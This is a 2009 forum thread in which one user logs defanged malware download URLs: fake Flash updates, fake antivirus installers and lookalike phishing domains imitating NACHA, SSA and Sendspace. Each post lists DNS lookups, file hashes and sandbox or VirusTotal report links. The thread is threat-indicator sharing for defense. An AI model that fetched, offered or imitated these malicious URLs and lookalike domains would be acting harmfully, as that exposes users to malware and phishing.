Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 02, 2009, 01:17:20 am
Code: [Select]
hxxp://adobeflashupdates.com/install_flash_player.exe

$ dig adobeflashupdates.com +short
91.211.224.168

http://www.virustotal.com/analisis/a501ecd7e6e78ead459d8e194140456e71421a8948ce80305d4f92728414ac56-1254444388 10/41


adobeflashupdates.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 02, 2009, 03:13:18 pm
Code: [Select]
hxxp://the-offspring.cn/?pid=216&sid=2cb766

$ dig the-offspring.cn +short
89.248.174.58

hxxp://pc-scan23.com/download/Soft_216.exe

$ dig pc-scan23.com +short
213.163.89.60
89.248.174.58
91.212.127.202
188.40.50.232

http://www.virustotal.com/analisis/8490ed7776c78e87c865aca2693a627b775a6781ecf6f5777df5ace90dccd4ac-1254493452 5/41


the-offspring.cn
pc-scan23.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 09, 2009, 02:31:31 pm
Code: [Select]
hxxp://getfreediscounts.cn/?pid=202&sid=c380a2

$ dig getfreediscounts.cn +short
204.12.226.171

hxxp://bestspywarescanner05.com/download/Soft_202.exe

$ dig bestspywarescanner05.com +short
213.163.89.59
204.12.226.171

http://www.virustotal.com/analisis/bd5865c8b2f8d2f40194df88c1a40840f3b18146bac51349ea645203c38fc65f-1255098228 3/41


getfreediscounts.cn
bestspywarescanner05.com



Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 12, 2009, 03:52:55 pm
Code: [Select]
hxxp://disturbedweb0.com/?pid=71&sid=f3b6e0

$ dig disturbedweb0.com +short
204.12.226.171


hxxp://yourpcscanner09.com/download/Soft_71.exe

$ dig yourpcscanner09.com +short
91.213.126.103
204.12.226.171
206.217.201.241

http://www.virustotal.com/analisis/9a909b16284a6b23f397af963f15dc3ebe51b855a96e48172e4267afe3c789fb-1255361926 5/41


disturbedweb0.com
yourpcscanner09.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 12, 2009, 11:48:53 pm
Code: [Select]
hxxp://md-multimedia-data.com/50.Cent.-.Baby.By.Me.(Full.CDS).2009.45026.exe

$ dig md-multimedia-data.com +short
66.197.132.22

http://www.virustotal.com/analisis/f535b9af0189f3246360482a0f0b30b1b585e8aac8f9f05e6addc1d61488952b-1255390879 5/41


md-multimedia-data.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 21, 2009, 05:39:38 pm
Code: [Select]
hxxp://checkwindowsupdate.com/?all=71

$ dig checkwindowsupdate.com +short
88.198.233.228

hxxp://91.212.127.200/setup.exe

http://www.virustotal.com/analisis/19bbdd415974a87f192a1139029f5c5f238d2082423f93808b7692696fc7e492-1256146394 4/41


checkwindowsupdate.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 21, 2009, 09:22:32 pm
Code: [Select]
hxxp://greattubesusa.com/xplays.php?id=45082

$ dig greattubesusa.com +short
216.240.143.7

hxxp://multiairservice.com/flash-HQ-plugin.45082.exe

$ dig multiairservice.com +short
64.191.103.86

http://www.virustotal.com/analisis/69557c5c6b45992434f9ba4d1c8e5b4a1e72800d622d223770151b3d787c2a7f-1256159776 4/41


greattubesusa.com
multiairservice.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 21, 2009, 11:12:03 pm
Code: [Select]
hxxp://stortfordaircadets.org.uk/flash/pdf.php

$ dig stortfordaircadets.org.uk +short
83.170.122.1

http://wepawet.iseclab.org/view.php?hash=6d1473d78da59542e4b4e92b61d1d41e&t=1256128140&type=js


Code: [Select]
hxxp://stortfordaircadets.org.uk/flash/exe.php?x=flash

$ dig stortfordaircadets.org.uk +short
83.170.122.1

http://www.virustotal.com/analisis/22e5542569911f89a87f010b4219a59e84fd9855bafd41a7e0cc3c391cd0aaa4-1256159360 12/41


stortfordaircadets.org.uk

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 23, 2009, 03:54:41 pm
Code: [Select]
hxxp://wbavv.com/docs/load.php?e=pdf

$ dig wbavv.com +short
91.212.127.225

file op.exe

http://www.virustotal.com/analisis/5955a39339af868f83fafa43770c13b765f46c31ceb3f528adc06ba1a4c59887-1256310499 1/40

http://anubis.iseclab.org/?action=result&task_id=1bac42b892f109094019f0007958c224e


wbavv.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 27, 2009, 03:51:09 pm
Code: [Select]
hxxp://devline.se/6/

$ dig devline.se +short
195.74.37.190

http://wepawet.iseclab.org/view.php?hash=127a4e09ef625bab7692d4c79425ae69&t=1256658918&type=js

Code: [Select]
hxxp://98.204.66.255/pid=1000/view/setup.exe

http://www.virustotal.com/analisis/65ab16df91cc5b0e8dfdfef2b28cd507f4cc388f3f905d2a5302dffe0e48ad30-1256614006 14/41

devline.se

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 02, 2009, 01:26:46 pm
Code: [Select]
hxxp://vivilan.cn/soft/surprise.exe

$ dig vivilan.cn +short
212.150.164.80

http://www.virustotal.com/analisis/8f753cbb1ddc3edda4a0b4ec0ce14475c2ed5e5890864f1d31ea8eefa28d01b2-1257097683 10/41


vivilan.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 03, 2009, 09:27:20 pm
Code: [Select]
hxxp://go-guardmypc.com/build7_172.php?cmd=getFile&counter=1&p=p52dcWlral%2FCj8bYbodyh1ik12qZVp%2FZatrau4FdlJ%2FJnsWYe3lwWqyopHaXXpqaaWWQaWlpyFPVpJHaotahk1ealXOL1dZ2Y2Zua2prbXCXZorPeKKcqaJ1ip22mZ3LapSWmGhpaWucmJU%3D

$ dig go-guardmypc.com +short
88.198.239.163

http://www.virustotal.com/analisis/8bf5ae477be526dd61f92805e6e39f808668804795a2699b1e2e6b5d4b24ebe2-1257283240 2/41


go-guardmypc.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 03, 2009, 11:11:38 pm
Code: [Select]
hxxp://supermediatool.com/flash-HQ-plugin.40072.exe

$ dig supermediatool.com +short
95.211.8.20

http://www.virustotal.com/analisis/5a6493098239d79e1a624cdab5356d03e9e12335ab2f0d4f35fb58fd15799052-1257289528 6/41


supermediatool.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 06, 2009, 04:25:09 pm
Code: [Select]
hxxp://implementmultimedia.net/flash-HQ-plugin.40072.exe

$ dig implementmultimedia.net +short
95.211.8.87

http://www.virustotal.com/analisis/1cbf4b16be07868073c39e972c0b787cec2d3168898be20cbc3485be8302ce4f-1257524309 7/40


implementmultimedia.net


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 06, 2009, 10:44:24 pm
Code: [Select]
hxxp://nt202.cn/cgi-bin/jl/jloader.pl?r=q/q1.dll

$ dig nt202.cn +short
174.120.6.156

http://www.virustotal.com/analisis/33ade50414bba8a5c271011f8ab3a8c5c3df580c600242f019d2b24f96d12c51-1257546584 5/40


nt202.cn


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 08, 2009, 11:56:08 am
Code: [Select]
hxxp://8000msn.cn/2009addown.cn/200903.exe

$ dig 8000msn.cn +short
61.174.59.9

http://www.virustotal.com/analisis/4bfd03b60593672fb122f8fe94697f8fa808386b517641d4a29412a74f7cac39-1257620825 21/40


8000msn.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 10, 2009, 11:22:18 pm
Code: [Select]
hxxp://emptymultimediaplugin.net/flash-HQ-plugin.40070.exe

$ dig  emptymultimediaplugin.net +short
95.211.8.87

http://www.virustotal.com/analisis/b455d65c15c2d1657a545da1d137249b25cb85167f3a4efbdaa82ebcec45437a-1257895085 7/41


emptymultimediaplugin.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 12, 2009, 02:48:00 pm
Code: [Select]
hxxp://nacha.org.tttteack.co.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.fffazss.me.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.tttteacx.me.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.fffazsf.co.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.tttteacg.co.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.redaczxj.co.uk/ACHNetwork/Unauthorized/report.exe

$ dig nacha.org.tttteack.co.uk +short
113.252.50.242
123.195.226.68
190.27.86.115
190.44.63.164
212.96.58.204
38.118.55.250
59.7.103.37
77.28.223.152
83.4.229.89
83.4.245.9
88.216.136.50
93.105.25.184
95.68.73.27
95.154.204.231
96.32.137.202

http://www.virustotal.com/analisis/52cb3e1c19872a35582f98cf1057b5aba8195508b2e2a6bc2b70dc4093ec22e2-1258036974 14/41


fffazsa.me.uk
fffazsa.org.uk
fffazsf.org.uk
fffazss.me.uk
redaczxj.co.uk
redaczxm.me.uk
redaczxn.co.uk
redaczxs.co.uk
tttteacb.co.uk
tttteacb.me.uk
tttteacf.org.uk
tttteacg.co.uk
tttteack.co.uk
tttteack.org.uk
tttteacx.co.uk
tttteacx.me.uk


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 16, 2009, 10:07:55 pm
Code: [Select]
hxxp://greatfilearea.com/TVPL.45206.exe

$ dig greatfilearea.com +short
95.211.8.87

http://www.virustotal.com/analisis/bcd9c093e9301d6d53d2a2d1ed6e0f5aa9413d1f5194a4618f2b8a70f7e4efdb-1258408768 5/41


greatfilearea.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 19, 2009, 03:19:02 pm
Code: [Select]
hxxp://75.132.134.104/d=reddevilsmcturkey.com/0x3E8/view/console=yes/setup.exe

http://www.virustotal.com/analisis/729a9964601580055618ea37aff54a8b90b85dfb81826ebedfca69323a8ab58c-1258643987 26/41
Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 20, 2009, 04:08:24 pm
Code: [Select]
hxxp://SOMETHING.BLANKED_OUT.com.verzzm.co.uk/webmail/settings/flashinstaller.exe

$ dig SOMETHING.BLANKED_OUT.com.verzzm.co.uk +short
24.139.111.53
41.140.12.94
41.250.51.69
123.238.64.50
186.82.74.161
189.194.234.28
189.195.90.188
190.6.231.17
190.34.19.5
190.165.60.231
200.92.130.32
201.164.185.31
201.165.78.197
201.227.63.110
24.42.38.115

http://www.virustotal.com/analisis/664a07e231e71235d4e852b43def0c758126fc07b6a1887c3981c44b568850dc-1258732566 19/41


verzzm.co.uk


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 20, 2009, 04:12:28 pm
Code: [Select]
hxxp://multimedia0serve.net/flash_player.40004.exe

$ dig multimedia0serve.net +short
95.211.8.87

http://www.virustotal.com/analisis/a06c97d90d8217fe489ee271bad317b474b82c3127ed6ae3c3808629888c5153-1258725152 6/41


multimedia0serve.net
Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 23, 2009, 02:22:30 pm
Code: [Select]
hxxp://76.27.180.212/d=www.firststategymnastics.com/0x3E8/view/console=yes/setup.exe

http://www.virustotal.com/analisis/bbb0187a775a97fd2dc82826341b48edddbe5b01f243e7fbfd2605c5b8361940-1258986036 9/41
Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 23, 2009, 10:11:14 pm
Code: [Select]
hxxp://statements.ssa.gov.fawaazf.be/acu/IPS_INTR/statement.exe

$ dig statements.ssa.gov.fawaazf.be +short
58.191.168.106
82.239.102.188
114.47.118.200
121.115.216.194
186.104.40.95
189.78.30.193
189.111.21.92
190.35.68.13
190.164.187.48
190.247.140.107
200.112.82.23
201.13.160.165
201.42.86.54
201.68.198.205
220.66.118.214

http://www.virustotal.com/analisis/20562828a60bf4ca66ee8121bcfb659daa81d4da94ffc4fed244ec702ae00eaf-1259014141 8/41

http://www.threatexpert.com/report.aspx?md5=b01b74ca78b4f405c575596473d8e4fd


fawaazf.be

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 24, 2009, 12:07:51 am
Code: [Select]
hxxp://199.0.198.210/d=gratisprogram.no/0x3E8/view/console=yes/setup.exe

$ md5sum setup.exe
1922fc33dff9f84de1cf23a03e6dd2b7  setup.exe

http://www.virustotal.com/analisis/b182443c0cc791f02a7b8a0e5e535e2d5ebb08bd65a5c0909439ab8555bbe3af-1259000878 14/41

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 24, 2009, 05:23:11 pm
Code: [Select]
hxxp://archive204975674.hlrtfeu.com/photo-hosting/PhotoArchive.exe

$ md5sum PhotoArchive.exe
15eee9b83ce227cde6c3153cb8761808  PhotoArchive.exe

$ dig archive204975674.hlrtfeu.com +short
222.131.142.214
60.52.52.118
113.10.46.229
117.242.113.115
121.96.106.59
187.44.253.162
189.196.17.219
190.34.51.100
190.53.8.98
190.53.136.29
190.128.153.40
190.142.63.143
190.225.9.54
201.226.241.26
210.89.36.19

http://www.virustotal.com/analisis/381c37778605699172d8c290c19345db04233531f8e4d4570570de5f2271f06c-1259083188 10/41


hlrtfeu.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 30, 2009, 04:26:30 pm
Code: [Select]
hxxp://graphwebgo.cn/setup/setup.exe

$ dig graphwebgo.cn +short
212.117.169.163

$ md5sum setup.exe
4e6349ea8c5c2045c10e33a25b9c4844  setup.exe

http://www.virustotal.com/analisis/1974f10da5f13ba9132cc14243daee9285e2a0bd397544cf25bed4c095920d0e-1259597534 1/40

http://www.threatexpert.com/report.aspx?md5=4e6349ea8c5c2045c10e33a25b9c4844


graphwebgo.cn


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 01, 2009, 12:10:03 pm
Code: [Select]
hxxp://best-scan004.com/download/Antivir-1370821_2002-8.exe

$ dig best-scan004.com +short
67.215.66.132
96.9.180.102
78.47.230.38

$ md5sum Antivir-1370821_2002-8.exe
b9fb9c9318972d5f2f38a37520fdbcad  Antivir-1370821_2002-8.exe

http://www.virustotal.com/analisis/1de1e284f62ec9837ab999d280cb6106d5c912407200fbd5b0f804392323cb2a-1259668583 6/41

http://anubis.iseclab.org/?action=result&task_id=1d4c1155c65e5f9a47d0ff7595abb24c1&format=html


best-scan004.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 01, 2009, 12:13:23 pm
Code: [Select]
hxxp://arc_iduwrs473.orange-llc.com/page-images/archives/PhotoArchive.exe

$ dig arc_iduwrs473.orange-llc.com +short
80.74.157.11

$ md5sum PhotoArchive.exe
6788cdd64bda0f4f4967383481440972  PhotoArchive.exe

http://www.virustotal.com/analisis/816e019336946a8bcf27cdb19bddae2dcd43029e7c6aa168769f3d97111e1b24-1259667921 14/41


orange-llc.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 01, 2009, 09:20:17 pm
Code: [Select]
hxxp://bestmultimedialist.net/flash-HQ-plugin.45204.exe

$ dig bestmultimedialist.net +short
95.211.8.119

$ md5sum flash-HQ-plugin.45204.exe
6f3015d3a4c7e3516933f97aa91104f2  flash-HQ-plugin.45204.exe

http://www.virustotal.com/analisis/127ee24999148c0a45bdf145303c4a5e33a0e852172492bf24465edf68e0a1e2-1259701841 0/41
https://cwsandbox.org/?site=1&page=details&id=971692&password=midhpmwhls
http://anubis.iseclab.org/?action=result&task_id=1d9b8c18a337de714492edc0fc2c4f9a3&format=html


bestmultimedialist.net


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 02, 2009, 11:07:25 pm
Code: [Select]
hxxp://allmultimediatools.com/flash-HQ-plugin.45209.exe

$ dig allmultimediatools.com +short
95.211.8.119

$ md5sum flash-HQ-plugin.45209.exe
e82e2b3ad956ce73ba32f45074f6a1b2  flash-HQ-plugin.45209.exe

http://www.virustotal.com/analisis/d6a162926ac79b18c03d70cd378c2d9ec3fa7d4840622148d1d8b9ef3daeebda-1259794988 1/41
https://cwsandbox.org/?page=report&analysisid=1350162&password=xknbioswmq
http://anubis.iseclab.org/?action=result&task_id=16b0a6957b7316284612b000cd4c663e0
http://www.threatexpert.com/report.aspx?md5=e82e2b3ad956ce73ba32f45074f6a1b2


allmultimediatools.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 03, 2009, 03:09:31 am
Code: [Select]
hxxp://66.32.8.226/d=theroamingjew.com/0x3E8/view/console=yes/setup.exe

$ md5sum setup.exe
64501247b35d1381ccfcb7a8ee33feea  setup.exe

http://www.virustotal.com/analisis/73a25f99e584e474cf8719e54a178648548fd34171e1c52bc020c9d129f2a6f5-1259737778 19/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 03, 2009, 11:40:11 pm
Code: [Select]
hxxp://freehostforyou.cn/hot.exe

$ dig freehostforyou.cn +short
124.217.239.157

$ md5sum hot.exe
90761e30474db84b18051bf0031c32eb  hot.exe

http://www.virustotal.com/analisis/5b0371ee54d2abe16982f674e3d8f799a4cd5cc95a81dc9b4c5bd459364586a3-1259882812 3/41
http://anubis.iseclab.org/?action=result&task_id=154e9863ce80615e491d7cea75c3b74a0
https://cwsandbox.org/?page=report&analysisid=1363108&password=dwdowgqeyv


freehostforyou.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 06, 2009, 10:02:07 pm
Code: [Select]
hxxp://altstream.cn/p2/

$ dig altstream.cn +short
193.104.94.45

redirects to

Code: [Select]
hxxp://freebigutilites.com/flash-plugin_update.40028.exe

$ dig freebigutilites.com +short
69.10.41.147

$ md5sum flash-plugin_update.40028.exe
0d9905ef33557bcecfa80ef615406424  flash-plugin_update.40028.exe

http://www.virustotal.com/analisis/f38fcce2ac8d754715c5e0c93c9b32fc177c34faf5972b46c4a550265105e3e0-1260136390 3/41
http://anubis.iseclab.org/?action=result&task_id=18b93f934b3cb9a047d4da5fbf882390e&format=html
http://www.threatexpert.com/report.aspx?md5=0d9905ef33557bcecfa80ef615406424
https://cwsandbox.org/?page=report&analysisid=1673086&password=shiedtogti


altstream.cn
freebigutilites.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 07, 2009, 04:41:26 pm
Code: [Select]
hxxp://ms-top-antivirus.cn/download/Antivir-d97b01e_2002-8.exe

$ dig ms-top-antivirus.cn +short
78.47.230.38
93.174.93.117
88.198.160.57
204.12.220.170

$ md5sum Antivir-d97b01e_2002-8.exe
072c7723f5e1df595f9482651b2a74f8  Antivir-d97b01e_2002-8.exe

http://www.virustotal.com/analisis/9a5601304304d6ca50f687929bc2bc4014bde5e9da7f5cbc4a567c932b4500f6-1260203800 1/41
https://cwsandbox.org/?page=report&analysisid=1735689&password=yoxiynzyfu
http://anubis.iseclab.org/?action=result&task_id=11980a90ae92a48e4a122172c78f3b6b7


ms-top-antivirus.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 08, 2009, 05:59:42 pm
Code: [Select]
hxxp://secure-zone-021.cn/download/Antivir-fdbd66_2002-8.exe

$ dig secure-zone-021.cn +short
93.174.93.117
204.12.220.170
78.47.230.38
88.198.160.57

$ md5sum Antivir-fdbd66_2002-8.exe
644f14dc75da9f0df47ca623a99e56b4  Antivir-fdbd66_2002-8.exe

http://www.virustotal.com/analisis/0bbbe602043466f009b069fc76606fee9fe915d497e50b0403cca283d4713b06-1260294894 3/41


secure-zone-021.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 08, 2009, 07:32:28 pm
Code: [Select]
hxxp://skytechsoftware.com/flash-HQ-plugin.45204.exe

$ dig skytechsoftware.com +short
69.10.41.147

$ md5sum flash-HQ-plugin.45204.exe
515d5f1f160f8d2689814dd29bfbdbbb  flash-HQ-plugin.45204.exe

http://www.virustotal.com/analisis/f672541a357a3755e77f0d237de4681f0c3182b1d2226f535e52aa2ef12e8f8f-1260300245 3/41
http://anubis.iseclab.org/?action=result&task_id=1b46c1df1d0f6b124f5ca4d68aba0db03
http://www.threatexpert.com/report.aspx?md5=515d5f1f160f8d2689814dd29bfbdbbb


skytechsoftware.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 10, 2009, 12:32:24 am
Code: [Select]
hxxp://puretechstorage.net/Rihanna.-.Rated.R.45026.exe

$ dig puretechstorage.net +short
64.120.141.99

$ md5sum Rihanna.-.Rated.R.45026.exe
2116ab12155c2d54ab9b087e6bf2c612  Rihanna.-.Rated.R.45026.exe

http://www.malwaredomainlist.com/mdl.php?search=64.120.141&colsearch=All&quantity=50
http://www.virustotal.com/analisis/f77afe91cad95be623c4d3dba6ee2b2925c98681e1516867f93bbc038b3fd9e1-1260404932 5/41
https://cwsandbox.org/?page=report&analysisid=1765456&password=esbuirbnov
http://anubis.iseclab.org/?action=result&task_id=19c3e59f7fd0117941d610f93c1b3a71f&format=html
http://www.threatexpert.com/report.aspx?md5=2116ab12155c2d54ab9b087e6bf2c612


puretechstorage.net


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 10, 2009, 02:49:55 pm
Code: [Select]
hxxp://top2009securityv.cn/download/Antivir-a5320_2005-10.exe

$ dig top2009securityv.cn +short
93.158.114.63
204.12.252.101
93.174.93.117
93.174.93.34
88.198.160.57
89.248.162.141

$ md5sum Antivir-a5320_2005-10.exe
f506baa16dc0a58db47d53f57681f94a  Antivir-a5320_2005-10.exe

http://www.virustotal.com/analisis/fddb822f707833523b35713c599dd91d4b3783f8d63ccdb0c747a0442c3c614c-1260456119 8/41
http://anubis.iseclab.org/?action=result&task_id=13724dfb9e15e03c4497c68cb5b0d9b53
https://cwsandbox.org/?page=report&analysisid=1770793&password=qrimowfbqi


top2009securityv.cn


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 10, 2009, 04:08:00 pm
Code: [Select]
hxxp://top2009securityf.cn/download/Antivir-73c_2005-10.exe

$ dig top2009securityf.cn +short
93.174.93.34
88.198.160.57
93.174.93.117
89.248.162.141
204.12.252.101
93.158.114.63

$ md5sum Antivir-73c_2005-10.exe
692098170cfb7277fa2d83a8fc0e2195  Antivir-73c_2005-10.exe

http://www.virustotal.com/analisis/5cde2c4b9b37c19d8553cd6d9a101ae92e7fa409a90addd7eb7045c8f88e8c38-1260461187 2/41


top2009securityf.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 10, 2009, 04:36:03 pm
Code: [Select]
hxxp://2009pluginmedia.com/AdobeFlashPlayer_Update.40056.exe

$ dig 2009pluginmedia.com +short
64.120.141.99

$ md5sum AdobeFlashPlayer_Update.40056.exe
0d15d43bc2533727c84373b288f8132b  AdobeFlashPlayer_Update.40056.exe

http://www.malwaredomainlist.com/mdl.php?search=64.120.141&colsearch=All&quantity=50
http://www.virustotal.com/analisis/bdcf53dadf689aeadd9058e7a3ae746564ef1d161f42dee67d1f31dd4a0d5ea4-1260462505 4/41
https://cwsandbox.org/?page=report&analysisid=1771534&password=iuerlgfrpl
http://www.threatexpert.com/report.aspx?md5=0d15d43bc2533727c84373b288f8132b


2009pluginmedia.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 15, 2009, 08:41:26 pm
Code: [Select]
hxxp://www.sendspace.com.ttkalasa.be/file/share/photo.exe

$ dig www.sendspace.com.ttkalasa.be +short
190.53.139.62
190.82.200.142
190.82.220.178
190.204.104.47
196.217.228.206
201.53.91.88
201.132.225.30
201.160.249.217
201.173.45.118
201.226.151.13
217.132.80.17
58.9.96.47
114.183.45.220
121.120.199.161
190.37.112.152

$ md5sum photo.exe
89fa4f680a3ff0971df0d8782f7acc0d  photo.exe

http://www.virustotal.com/analisis/03e43923658bfc991003d378e9d410705fbf46d344360e8257993ee8e53313ec-1260909549 7/40
https://cwsandbox.org/?page=report&analysisid=1874566&password=svtdhdieyt
http://www.threatexpert.com/report.aspx?md5=89fa4f680a3ff0971df0d8782f7acc0d


ttkalasa.be

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 16, 2009, 02:38:10 pm
Code: [Select]
hxxp://a7bestdefence.com/download/Antivir-b90b45_2006-54.exe

$ dig a7bestdefence.com +short
193.104.22.203
88.198.160.57

$ md5sum Antivir-b90b45_2006-54.exe
910eb411cfb59168a0194330a7ce21df  Antivir-b90b45_2006-54.exe

http://www.malwaredomainlist.com/mdl.php?search=193.104.22&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.160&colsearch=All&quantity=50

http://www.virustotal.com/analisis/93687ec39ed73c0f052c316ed8c564bf028dbb1368a4aa8dfd3b1ecfc00d0294-1260972779 0/41
http://www.threatexpert.com/report.aspx?md5=910eb411cfb59168a0194330a7ce21df
https://cwsandbox.org/?page=report&analysisid=1881693&password=keunsvihtu


a7bestdefence.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 16, 2009, 10:47:10 pm
Code: [Select]
hxxp://securityonlinevideo.net/hitin.php?land=20&affid=92400

$ dig securityonlinevideo.net +short
193.106.32.10

http://www.virustotal.com/analisis/c545d6c876e3c3dc2b78e9735f4d57b702eb2d4f55626517cc69205bed0cb3eb-1261003418 9/40
http://wepawet.iseclab.org/view.php?hash=52fb7f6078566e5bcf2c75e481bcb7e4&t=1261004257&type=js
http://anubis.iseclab.org/?action=result&task_id=1fca47f09ce3145a44de001457b027bfa


securityonlinevideo.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 17, 2009, 12:35:57 pm
Code: [Select]
hxxp://antyflu.net/hitin.php?land=20&affid=91801

$ dig antyflu.net +short
193.104.12.2

http://www.virustotal.com/analisis/99c7da8561da71e53c245b0b54ac729f3bd28ab05582a13a3c2d66a79fc64de6-1261048442 7/41
http://anubis.iseclab.org/?action=result&task_id=16727529c6de106a4196c073acffa63c9
http://wepawet.iseclab.org/view.php?hash=43fb4cd25f76ac4595561e1c8186967e&t=1261049291&type=js
https://cwsandbox.org/?page=report&analysisid=1890235&password=jsqpfciskv

antyflu.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 17, 2009, 11:39:25 pm
Code: [Select]
hxxp://newantyvirustool.net/hitin.php?land=20&affid=92800

$ dig newantyvirustool.net +short
193.104.153.245

http://www.malwaredomainlist.com/mdl.php?search=193.104.153&colsearch=All&quantity=50
http://wepawet.iseclab.org/view.php?hash=32210ef6d32bc07c22b88a69841bd5a1&t=1261093786&type=js
http://anubis.iseclab.org/?action=result&task_id=17443e9438c5a3f6465b1b51b185859da
http://www.virustotal.com/analisis/8ecd09f38683889764653fd2bce046f1a8b2bd22de16d3216664052b090bb9f8-1261092956 10/41


newantyvirustool.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 18, 2009, 07:56:23 pm
Code: [Select]
hxxp://twofinestutilites.com/liteplayer.45206.exe

$ dig twofinestutilites.com +short
64.120.141.5

$ md5sum liteplayer.45206.exe
a405340f40532107fbd7558f5cee0bcc  liteplayer.45206.exe

http://www.virustotal.com/analisis/580c78de2c3cd5ae1f605be5a9ce6bbde0c227729e6b8fb047896dca6a6f89ed-1261165900 6/40
http://anubis.iseclab.org/?action=result&task_id=1c9e34154bdb26cb49542ee690ef63944
https://cwsandbox.org/?page=report&analysisid=1904100&password=lsoqgsxtki
http://anubis.iseclab.org/?action=result&task_id=1c9e34154bdb26cb49542ee690ef63944&format=html


twofinestutilites.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 19, 2009, 03:50:11 am
Code: [Select]
hxxp://thescandan.com/downloader.php?affid=92003

$ dig thescandan.com +short
193.169.234.19

$ md5sum install.exe
00974b36ca8876cde9eee334150707e8  install.exe

http://www.virustotal.com/analisis/957c5ca099bf719a8683774f5e1c0d349fdacd21b9e60035e268741faeb45b69-1261194495 8/40
http://wepawet.iseclab.org/view.php?hash=91a87dcbb8a14d99be5e57467881c9ab&t=1261195430&type=js

thescandan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 21, 2009, 03:03:00 pm
Code: [Select]
hxxp://networksecurityinfo.com/downloader.php?affid=91109

$ dig networksecurityinfo.com +short
94.102.63.245

$ md5sum install.exe
8d997dc279887fb3e04fea8d085a9aee  install.exe

http://www.virustotal.com/analisis/bc874ddbc5467481b40cc6b5a9f0cdb290ba9ccb989a3865cf23e8c1b4d75ebe-1261407699 10/40
https://cwsandbox.org/?page=report&analysisid=1977185&password=nhzqvmjobf
http://www.threatexpert.com/report.aspx?md5=8d997dc279887fb3e04fea8d085a9aee


networksecurityinfo.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 21, 2009, 04:37:35 pm
Code: [Select]
hxxp://virusexamine.com/downloader.php?affid=34100

$ dig virusexamine.com +short
193.169.13.15

$ md5sum install.exe
6a4c8beae1aefa86a87b0795e267cb24  install.exe

http://www.virustotal.com/analisis/4e67a4948a3a08c6699fed5b25af5ed4a33764bca966a02919b6dccfec189137-1261413328 12/40
https://cwsandbox.org/?page=report&analysisid=1978525&password=phkjpjgnuu
http://www.threatexpert.com/report.aspx?md5=6a4c8beae1aefa86a87b0795e267cb24


virusexamine.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 21, 2009, 05:47:20 pm
Code: [Select]
hxxp://www.thumser-online.de/store/images/large/install_flash_player.exe

$ dig www.thumser-online.de +short
81.169.145.82

$ md5sum install_flash_player.exe
fa168bb0e6cf2e0cc937888b92f63416  install_flash_player.exe

http://www.virustotal.com/analisis/79e9a54d15d4e74c2674c778ed33700e2718766a1f98020c3889438957aaee7a-1261416462 5/41
http://anubis.iseclab.org/?action=result&task_id=1dd5e0e7ce59d94b40d27c8b4801b0979&format=html
https://cwsandbox.org/?page=report&analysisid=1979532&password=oncymhnwmz
http://www.threatexpert.com/report.aspx?md5=fa168bb0e6cf2e0cc937888b92f63416


thumser-online.de

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 22, 2009, 12:13:50 am
Code: [Select]
hxxp://free-scanner-spyware.biz/get.php?sc=1&id=259b4c25aa08557e7c8892c5d64253db

$ dig free-scanner-spyware.biz +short
193.106.32.40

http://www.virustotal.com/analisis/4e6286bc34b5c6fb92f1571760d304186c759eb24fdd008ca14a4949bb9e9e04-1261440681 24/40


free-scanner-spyware.biz


Title: Re: Mr Clean's dirt
